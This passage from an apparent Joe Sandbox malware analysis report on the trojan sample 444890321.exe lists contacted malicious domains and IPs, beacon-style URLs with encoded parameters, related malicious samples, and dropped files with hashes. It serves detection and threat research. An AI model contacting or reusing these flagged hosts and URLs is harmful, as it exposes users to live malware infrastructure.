http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
www.111bjs.com/ccr/ | 100% | Avira URL Cloud | malware
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mekarauroko7389.com | 163.44.239.72 | true | true | | unknown
www.oklahomasundayschool.com | 199.59.242.153 | true | true | | unknown
www.shamushalkowich.com | 35.169.40.107 | true | true | | unknown
www.mekarauroko7389.com | unknown | unknown | true | | unknown

                  Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.oklahomasundayschool.com/ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zp | true | Avira URL Cloud: safe | unknown
http://www.mekarauroko7389.com/ccr/?FJB=DYL3Mol3r87Z8qId+4Ycjijbq71Py48wOU/SaqdUDZ5D3FcnOOzajI1IKd683KRXh37z&v0=JDK8Zp | true | Avira URL Cloud: safe | unknown
http://www.shamushalkowich.com/ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRevKVZrdd8Pf&v0=JDK8Zp | true | Avira URL Cloud: safe | unknown
www.111bjs.com/ccr/ | true | Avira URL Cloud: malware | low

                  URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | | high
https://www.shamushalkowich.com/ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRev | WWAHost.exe, 0000000A.00000002.472331929.000000000480F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | 444890321.exe | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | 444890321.exe | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000004.00000000.234507726.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                          Contacted IPs


                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
199.59.242.153 | www.oklahomasundayschool.com | United States | 395082 | BODIS-NJUS | true
163.44.239.72 | mekarauroko7389.com | Japan | 7506 | INTERQGMOInternetIncJP | true
35.169.40.107 | www.shamushalkowich.com | United States | 14618 | AMAZON-AESUS | true

                                          General Information

                                          Joe Sandbox Version:32.0.0 Black Diamond
                                          Analysis ID:433174
                                          Start date:11.06.2021
                                          Start time:12:14:23
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 36s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:444890321.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:27
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@9/4@3/3
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 26.3% (good quality ratio 24.5%)
                                          • Quality average: 77.3%
                                          • Quality standard deviation: 29.4%
                                          HCA Information:
                                          • Successful, ratio: 89%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 104.43.139.144, 92.122.145.220, 13.64.90.137, 168.61.161.212, 23.218.208.56, 20.82.209.183, 93.184.221.240, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.50.102.62
                                          • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                          • Not all processes were analyzed, report is missing behavior information
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/433174/sample/444890321.exe

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                          199.59.242.153 | 2435.exe | Get hash | malicious | Browse
                                          • www.northsytyle.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W
                                          | ] New Order Vung Ang TPP Viet Nam.exe | Get hash | malicious | Browse
                                          • www.greenshirecommons.com/un8c/?8p=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwuwR4xQFHfof&h6Z=FZOTUTGPt4-
                                          | fD56g4DRzG.exe | Get hash | malicious | Browse
                                          • www.frontpagesweb.net/w88t/?1bWl=DwAbJomwIIUam/8Lxif0xJyCLP0/MlDCQn/X6EWMKnqqCjXzJeuBHxh9ROI30kSy7fCE&z6z=STRxNL2x
                                          | malware300.docm | Get hash | malicious | Browse
                                          • ww25.gokeenakte.top/admin.php?f=1&subid1=20210605-2000-3553-b2c5-4eab817b0105
                                          | Payment.exe | Get hash | malicious | Browse
                                          • www.digitalgamerentals.com/ngvm/?3fl00=eXBfF5JabAMvoJeV+Y5ra8EK8SdWvzGjXwXzLVFQuPc9hZ/16jkYHGAZEYy2Tm7CaklT&9rdLfJ=i48HtpdXmp
                                          | PROFORMA INVOICE PDF.exe | Get hash | malicious | Browse
                                          • www.chrispricellc.com/owws/?y8z=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6zNTHuB4YMFv&UDKPKv=04i8JpzhsHVX
                                          | Order.exe | Get hash | malicious | Browse
                                          • www.sweeneysservicecenter.com/jogt/?w6ATB0=U2LhZ94w5IDC+2DErQbRlpD/OzsCIaT6lUf8FwZRqb7l7kFTMUkxaoKrt4WuZdpJEkCM&Jxox=Er6tXhMxl
                                          | INQ-741-020621-PDF.exe | Get hash | malicious | Browse
                                          • www.hairgrowinggenius.com/pb93/?a0GLMhc=KPEvW4YRciSJiJFFNYizsATDgsgPxpmwnLISCA8VBLwfqs8m2gzQMN5Q9cE7knzB0ifR&rTqL5=0DKH1VwxRB
                                          | CONTAINER DEPOSIT.exe | Get hash | malicious | Browse
                                          • www.northsytyle.com/dxe/?nPRT_Pn=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W&k6Ad3=_vc0KnhxhJu
                                          | Swift copy_9808.exe | Get hash | malicious | Browse
                                          • www.scientiagenus.com/p6nu/?C2JdTP=eE7I+Sv8iOFRLyMlwLdgwXijBECgGV3UTircOP7TdIwQdQ324QcldvmuNHuZw5leTbqh&z6nHM=ITnT9Fg
                                          | #U20ac9,770 pdf.exe | Get hash | malicious | Browse
                                          • www.jobswithsecurityclearance.com/pux4/?Lv0h=3mylV7pVONTMNM6aC/niqCihOZ2+qzoqaVpusSVEetlxoEhqYhjCa0mWM/mNyWLbLdeFpUieiA==&VlKt=wBNl4pd0L
                                          | Pdf Scen Invoice 17INV06003.exe | Get hash | malicious | Browse
                                          • www.friendsed.com/s5cm/?O2=aT8vL+GQ5CKbWMYK7VfKTGSzb4SrkpvWRcVzxRDty813pzzqsjZ5NUDQNQmBAQnsw0DU&2d=YX9ti2PX
                                          | ORDER LIST.pdf.exe | Get hash | malicious | Browse
                                          • www.chrispricellc.com/owws/?t8l=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6whQbeNAVt45EvY6Zw==&YBZL=lxldV
                                          | quote.pdf.exe | Get hash | malicious | Browse
                                          • www.chrispricellc.com/owws/?rVEx8D=S0GhCH&RR=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6whpEvtDb7k+EvY9KA==
                                          | hrUbr1mLqzggh0H.exe | Get hash | malicious | Browse
                                          • www.poltgroup.com/onqm/?6l=doD+GTTuj0wR7cILLxImcVYaTf1RJOz68mAknHdMm+lQBhaMdEcvcwimwgDNMMFRe7JRpz2F8Q==&2dm=3fklvpq0OPLdJVy
                                          | packa.....(1).exe | Get hash | malicious | Browse
                                          • www.educationstarcorp.com/wdva/?kfD4qZ=xabDW6gRomVRJCfQhE+1Y8vLHDgRz3GtPRqb2ZQ8ev+ZOg56Covo/3nqdMEaAH6lCy+g&kr0=dbF0vFoPNvL
                                          | Pdf MT103 - Remittance.pdf.exe | Get hash | malicious | Browse
                                          • www.ultimateplumpudding.co.uk/s5cm/?kR-4q=E2OK2mHSQGkTABA7rh5rFu9YJ97LBg918ZBY5I6VyKJbM1VF4fyc5eTvcYaTxAWeq+U4CfyJeQ==&P0D=Atxturd
                                          | henry.exe | Get hash | malicious | Browse
                                          • www.booster.guru/aipc/?MZg=BMi4rIX3OaRmAVdWmHwDy158GXvJowW6rsMkLX8T/SeurUfZZjefoMGqIKxJ2f9Kzzfm&zTxX=ApdHHR
                                          | Ohki Blower Skid Base Enquiry 052521.exe | Get hash | malicious | Browse
                                          • www.greenshirecommons.com/un8c/?vR=Ltxx&5j9=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwtQB3QA9Z6BY
                                          | porosi e re Fature Proforma.exe | Get hash | malicious | Browse
                                          • www.fux.xyz/nt8e/?v2Mp4=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLtt2QtFrhXJ5&jJBP5D=-ZpPy
                                          163.44.239.72 | bdc0c7d3_by_Libranalysis.xls | Get hash | malicious | Browse
                                          • www.mekarauroko7389.com/ccr/?LPF8=DYL3Molyr77d86ER84Ycjijbq71Py48wOUnCGpBVH55C30whJeiW1MNKJ4WqzaVkq0mDKw==&pBZ8=erpxZdFXSD
                                          | pvUopSIi7C5Eklw.exe | Get hash | malicious | Browse
                                          • www.ero-dogamax.com/cpo/?AnB=ZOKfawDDM5+ycPLMG5OeFWFqAlRMpdVZ2hrxY6qKonp9UXmNLhtdrUIXIGr69n5opRML&kFQhxH=5jp8cV8xwZ8x
                                          | Reconfirm seed quotation_ RUQ CONT NOB13452.exe | Get hash | malicious | Browse
                                          • www.your-card.net/suod/
                                          | QUOTE110.exe | Get hash | malicious | Browse
                                          • www.personalityisfree.com/vcd/?BB=Lzr4TtmpAHX4&YVMtapH=K+HZCw1qHYHdC+KSQX14d+D7ShJKCk/WiYrY/rNA5FzJi9N3qVpBsDMMRcWgkf/UdnmV

                                          Domains

                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                          ASN

                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                          INTERQGMOInternetIncJP | 5t2CmTUhKc.exe | Get hash | malicious | Browse
                                          • 150.95.255.38
                                          | lTAPQJikGw.exe | Get hash | malicious | Browse
                                          • 163.44.239.73
                                          | invoice.exe | Get hash | malicious | Browse
                                          • 163.44.185.221
                                          | PO187439.exe | Get hash | malicious | Browse
                                          • 118.27.99.19
                                          | LkvumUsaQX.exe | Get hash | malicious | Browse
                                          • 163.44.239.73
                                          | FORM C1.xlsx | Get hash | malicious | Browse
                                          • 163.44.239.73
                                          | triage_dropped_file.exe | Get hash | malicious | Browse
                                          • 163.44.185.221
                                          | qXDtb88hht.exe | Get hash | malicious | Browse
                                          • 163.44.239.73
                                          | FORM B.xlsx | Get hash | malicious | Browse
                                          • 163.44.239.73
                                          | 17jLieeOPx.exe | Get hash | malicious | Browse
                                          • 163.44.239.73
                                          | Compliance - Request for Courtesy Call -.xlsx | Get hash | malicious | Browse
                                          • 163.44.239.73
                                          | U4JZ8cQqvU.exe | Get hash | malicious | Browse
                                          • 163.44.239.73
                                          | 6dTTv9IdCw.exe | Get hash | malicious | Browse
                                          • 163.44.239.73
                                          | 000987654345XASD.exe | Get hash | malicious | Browse
                                          • 163.44.185.226
                                          | QyKNw7NioL.exe | Get hash | malicious | Browse
                                          • 163.44.239.73
                                          | Request for Courtesy Call - Urgent.xlsx | Get hash | malicious | Browse
                                          • 163.44.239.73
                                          | Invoice.exe | Get hash | malicious | Browse
                                          • 150.95.254.16
                                          | wMKDi0Ss3f.exe | Get hash | malicious | Browse
                                          • 163.44.239.73
                                          | ENrFQVzLHE.exe | Get hash | malicious | Browse
                                          • 163.44.239.73
                                          | USD 187036 pdf.exe | Get hash | malicious | Browse
                                          • 163.44.185.226
                                          AMAZON-AESUS | 8BDBD0yy0q.apk | Get hash | malicious | Browse
                                          • 3.213.149.159
                                          | 8BDBD0yy0q.apk | Get hash | malicious | Browse
                                          • 3.210.126.214
                                          | c71fd2gJus.exe | Get hash | malicious | Browse
                                          • 107.23.214.167
                                          | E1a92ARmPw.exe | Get hash | malicious | Browse
                                          • 34.205.91.18
                                          | crt9O3URua.exe | Get hash | malicious | Browse
                                          • 34.205.91.18
                                          | E1a92ARmPw.exe | Get hash | malicious | Browse
                                          • 34.205.91.18
                                          | triage_dropped_file.dll | Get hash | malicious | Browse
                                          • 23.23.104.250
                                          | o53icSdh9N.exe | Get hash | malicious | Browse
                                          • 34.202.33.33
                                          | qdAbNSGIbq.exe | Get hash | malicious | Browse
                                          • 52.204.109.97
                                          | DNPr7t0GMY.exe | Get hash | malicious | Browse
                                          • 54.85.86.211
                                          | omh.dll | Get hash | malicious | Browse
                                          • 23.21.205.229
                                          | fTxhRIDnrC.dll | Get hash | malicious | Browse
                                          • 34.201.169.54
                                          | Letter 09JUN 2021.xlsx | Get hash | malicious | Browse
                                          • 54.85.86.211
                                          | XumsQCALnX.exe | Get hash | malicious | Browse
                                          • 54.235.190.106
                                          | MV SHUHA QUEEN.docx | Get hash | malicious | Browse
                                          • 54.83.52.76
                                          | MV SHUHA QUEEN.docx | Get hash | malicious | Browse
                                          • 54.83.52.76
                                          | Docc.html | Get hash | malicious | Browse
                                          • 52.44.21.50
                                          | ManyToOneMailMerge Ver 18.2.dotm | Get hash | malicious | Browse
                                          • 34.236.65.196
                                          | Sleek_Free.exe | Get hash | malicious | Browse
                                          • 52.2.188.208
                                          | #Ud83d#Udcde_#U25b6#Ufe0f.htm | Get hash | malicious | Browse
                                          • 52.44.21.50
                                          BODIS-NJUS | 2435.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | ] New Order Vung Ang TPP Viet Nam.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | fD56g4DRzG.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | malware300.docm | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | Payment.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | PROFORMA INVOICE PDF.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | Order.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | INQ-741-020621-PDF.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | CONTAINER DEPOSIT.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | Swift copy_9808.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | S5.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | #U20ac9,770 pdf.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | Pdf Scen Invoice 17INV06003.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | ORDER LIST.pdf.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | quote.pdf.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | hrUbr1mLqzggh0H.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | packa.....(1).exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | Pdf MT103 - Remittance.pdf.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | henry.exe | Get hash | malicious | Browse
                                          • 199.59.242.153
                                          | Ohki Blower Skid Base Enquiry 052521.exe | Get hash | malicious | Browse
                                          • 199.59.242.153

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                          C:\Users\user\AppData\Local\Temp\nskAF64.tmp\System.dll | Packing-List_00930039.exe | Get hash | malicious | Browse
                                          | 2435.exe | Get hash | malicious | Browse
                                          | INVOICE.exe | Get hash | malicious | Browse
                                          | Shipment Invoice & Consignment Notification.exe | Get hash | malicious | Browse
                                          | KY4cmAI0jU.exe | Get hash | malicious | Browse
                                          | 5t2CmTUhKc.exe | Get hash | malicious | Browse
                                          | 8qdfmqz1PN.exe | Get hash | malicious | Browse
                                          | New Order PO2193570O1.doc | Get hash | malicious | Browse
                                          | L2.xlsx | Get hash | malicious | Browse
                                          | Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | Get hash | malicious | Browse
                                          | New Order PO2193570O1.pdf.exe | Get hash | malicious | Browse
                                          | 2320900000000.exe | Get hash | malicious | Browse
                                          | CshpH9OSkc.exe | Get hash | malicious | Browse
                                          | 5SXTKXCnqS.exe | Get hash | malicious | Browse
                                          | i6xFULh8J5.exe | Get hash | malicious | Browse
                                          | AWB00028487364 -000487449287.doc | Get hash | malicious | Browse
                                          | 090049000009000.exe | Get hash | malicious | Browse
                                          | dYy3yfSkwY.exe | Get hash | malicious | Browse
                                          | PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx | Get hash | malicious | Browse
                                          | Purchase Order Price List 061021.xlsx | Get hash | malicious | Browse

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Temp\dyngsgthl
                                                                                  Process:C:\Users\user\Desktop\444890321.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):56913
                                                                                  Entropy (8bit):4.949731846404961
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:VkJEJVyJy/L1CrDov35urtMC1c2hcv094+3:+JEJkuUrO35uro2N3
                                                                                  MD5:ABBA582340515314EC9FF824C04D0411
                                                                                  SHA1:06D227DE691D5A71EE18B380B9C2E9C1CE004921
                                                                                  SHA-256:D068732E61DE049EFBCB653C38143BB2F21744AB0D88D7622CD15D79875D3E8F
                                                                                  SHA-512:AFAC536FDBEBF4E00CD8671B70F01373C29924E93F0297304A4A053AEAE50CAE1B6F036B490BF3C1F6DD1E3D5205EB3B19B0A1C3E7C7C8E1501DA68334FB856A
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: U............ ...Z.!....."...q.#...A.$...A.%...6.&.....'.....(.....).....*.....+...A.,...6.-.........../.....0.....1...].2...t.3...A.4...A.5.....6...&.7.....8...A.9.....:.....;.....<...q.=...A.>...A.?...A.@.....A.....B.....C.....D.....E.....F.....G.....H.....I...A.J.....K...s.L.....M.....N.....O.....P...A.Q...A.R.....S.....T.....U.....V.....W.....X.....Y.....Z.....[.....\...9.].....^....._.....`...X.a.....b.....c.....d.....e...u.f...A.g...A.h...A.i.....j.....k...a.l...|.m...|.n...|.o.....p.....q.....r.....s.....t.....u...A.v.....w...s.x.....y.....z.....{.....|...A.}...A.~...............................................................9.......................X.......................I.....y.....A.....A.....A.......................|.....|.....|.................].................I.....A...........s.................]...........A.....A.................]
                                                                                  C:\Users\user\AppData\Local\Temp\nskAF63.tmp
                                                                                  Process:C:\Users\user\Desktop\444890321.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):276572
                                                                                  Entropy (8bit):7.48217833714595
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:sIHJRey4HqAoXOHXTBALgPk5k29GgTH2M0OUBot:RRnqM5k3sH2MjU+
                                                                                  MD5:81B6D7E7A76985346D6B8FDD2AAF7B64
                                                                                  SHA1:CE54CE32897D9A51ED74F5C76CD5154C8E631785
                                                                                  SHA-256:ABB0E78106433D40D7CD85ABB08963E8E15CF7F951BFFAD9F132E8B66E729819
                                                                                  SHA-512:90A64CF37A33CF50950A693A00625A8BC4F8ADE4080E63135C3173FC394D492115580B5658E191A572C1CFEB926F839306F60A4E1CC64DA80DF0022E0EAA791F
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: .S......,.......................T=.......S.......S..........................................................................................................................................................................................................................................J...................j...............................................................................................................................q.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\nskAF64.tmp\System.dll
                                                                                  Process:C:\Users\user\Desktop\444890321.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11776
                                                                                  Entropy (8bit):5.855045165595541
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                  MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                  SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                  SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                  SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: Packing-List_00930039.exe, Detection: malicious, Browse
                                                                                  • Filename: 2435.exe, Detection: malicious, Browse
                                                                                  • Filename: INVOICE.exe, Detection: malicious, Browse
                                                                                  • Filename: Shipment Invoice & Consignment Notification.exe, Detection: malicious, Browse
                                                                                  • Filename: KY4cmAI0jU.exe, Detection: malicious, Browse
                                                                                  • Filename: 5t2CmTUhKc.exe, Detection: malicious, Browse
                                                                                  • Filename: 8qdfmqz1PN.exe, Detection: malicious, Browse
                                                                                  • Filename: New Order PO2193570O1.doc, Detection: malicious, Browse
                                                                                  • Filename: L2.xlsx, Detection: malicious, Browse
                                                                                  • Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious, Browse
                                                                                  • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse
                                                                                  • Filename: 2320900000000.exe, Detection: malicious, Browse
                                                                                  • Filename: CshpH9OSkc.exe, Detection: malicious, Browse
                                                                                  • Filename: 5SXTKXCnqS.exe, Detection: malicious, Browse
                                                                                  • Filename: i6xFULh8J5.exe, Detection: malicious, Browse
                                                                                  • Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse
                                                                                  • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                  • Filename: dYy3yfSkwY.exe, Detection: malicious, Browse
                                                                                  • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious, Browse
                                                                                  • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious, Browse
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\ouzr6npxcb2d0txj
                                                                                  Process:C:\Users\user\Desktop\444890321.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):186368
                                                                                  Entropy (8bit):7.9990513558568574
                                                                                  Encrypted:true
                                                                                  SSDEEP:3072:zE6sRey1So6RqgToX1zJCHnYcTBALhrGPPaOmr5k2o4kTgBF3py80:GRey4HqAoXOHXTBALgPk5k29GgTH0
                                                                                  MD5:5205D9669FCC651E0611AA9081C47CE9
                                                                                  SHA1:C785A1B2A4F8A50F8E4DAD7304819FB4E162BB61
                                                                                  SHA-256:DDAED0614378CE5EB6110B6AF722F4878715C08BEAE158FAB0C705FC6D525EFD
                                                                                  SHA-512:7C817F5483309799D174D320D1A7F50F856CDCBAF5C4DDAF0791EFB8A277C1F73DBBA657F9EC1A49EA20703476A64C62A2051449C5E0DB859695FA746AB73328
                                                                                  Malicious:false
                                                                                  Reputation:low
